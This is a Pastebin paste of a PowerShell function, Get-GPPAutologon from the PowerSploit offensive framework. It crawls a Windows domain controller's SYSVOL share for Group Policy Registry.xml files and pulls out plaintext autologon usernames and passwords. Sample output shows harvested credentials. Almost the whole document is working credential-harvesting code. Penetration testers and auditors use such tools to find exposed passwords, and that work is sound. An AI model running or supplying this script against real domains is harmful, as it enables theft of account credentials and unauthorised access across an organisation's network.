Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- function Get-GPPAutologon
- {
- <#
- .SYNOPSIS
- Retrieves password from Autologon entries that are pushed through Group Policy Registry Preferences.
- PowerSploit Function: Get-GPPAutologon
- Author: Oddvar Moe (@oddvarmoe)
- Based on Get-GPPPassword by Chris Campbell (@obscuresec) - Thanks for your awesome work!
- License: BSD 3-Clause
- Required Dependencies: None
- Optional Dependencies: None
- .DESCRIPTION
- Get-GPPAutologn searches the domain controller for registry.xml to find autologon information and returns the username and password.
- .EXAMPLE
- PS C:\> Get-GPPAutolgon
- UserNames File Passwords
- --------- ---- ---------
- {administrator} \\ADATUM.COM\SYSVOL\Adatum.com\Policies\{... {PasswordsAreLam3}
- {NormalUser} \\ADATUM.COM\SYSVOL\Adatum.com\Policies\{... {ThisIsAsupaPassword}
- .EXAMPLE
- PS C:\> Get-GPPAutologon | ForEach-Object {$_.passwords} | Sort-Object -Uniq
- password
- password12
- password123
- password1234
- password1234$
- read123
- Recycling*3ftw!
- .LINK
- https://support.microsoft.com/nb-no/kb/324737
- #>
- [CmdletBinding()]
- Param ()
- #Some XML issues between versions
- Set-StrictMode -Version 2
- #define helper function to parse fields from xml files
- function Get-GPPInnerFields
- {
- [CmdletBinding()]
- Param (
- $File
- )
- try
- {
- $Filename = Split-Path $File -Leaf
- [xml] $Xml = Get-Content ($File)
- #declare empty arrays
- $Password = @()
- $UserName = @()
- #check for password and username field
- if (($Xml.innerxml -like "*DefaultPassword*") -and ($Xml.innerxml -like "*DefaultUserName*"))
- {
- $props = $xml.GetElementsByTagName("Properties")
- foreach($prop in $props)
- {
- switch ($prop.name)
- {
- 'DefaultPassword'
- {
- $Password += , $prop | Select-Object -ExpandProperty Value
- }
- 'DefaultUsername'
- {
- $Username += , $prop | Select-Object -ExpandProperty Value
- }
- }
- Write-Verbose "Potential password in $File"
- }
- #put [BLANK] in variables
- if (!($Password))
- {
- $Password = '[BLANK]'
- }
- if (!($UserName))
- {
- $UserName = '[BLANK]'
- }
- #Create custom object to output results
- $ObjectProperties = @{'Passwords' = $Password;
- 'UserNames' = $UserName;
- 'File' = $File}
- $ResultsObject = New-Object -TypeName PSObject -Property $ObjectProperties
- Write-Verbose "The password is between {} and may be more than one value."
- if ($ResultsObject)
- {
- Return $ResultsObject
- }
- }
- }
- catch {Write-Error $Error[0]}
- }
- try {
- #ensure that machine is domain joined and script is running as a domain account
- if ( ( ((Get-WmiObject Win32_ComputerSystem).partofdomain) -eq $False ) -or ( -not $Env:USERDNSDOMAIN ) ) {
- throw 'Machine is not a domain member or User is not a member of the domain.'
- }
- #discover potential registry.xml containing autologon passwords
- Write-Verbose 'Searching the DC. This could take a while.'
- $XMlFiles = Get-ChildItem -Path "\\$Env:USERDNSDOMAIN\SYSVOL" -Recurse -ErrorAction SilentlyContinue -Include 'Registry.xml'
- if ( -not $XMlFiles ) {throw 'No preference files found.'}
- Write-Verbose "Found $($XMLFiles | Measure-Object | Select-Object -ExpandProperty Count) files that could contain passwords."
- foreach ($File in $XMLFiles) {
- $Result = (Get-GppInnerFields $File.Fullname)
- Write-Output $Result
- }
- }
- catch {Write-Error $Error[0]}
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement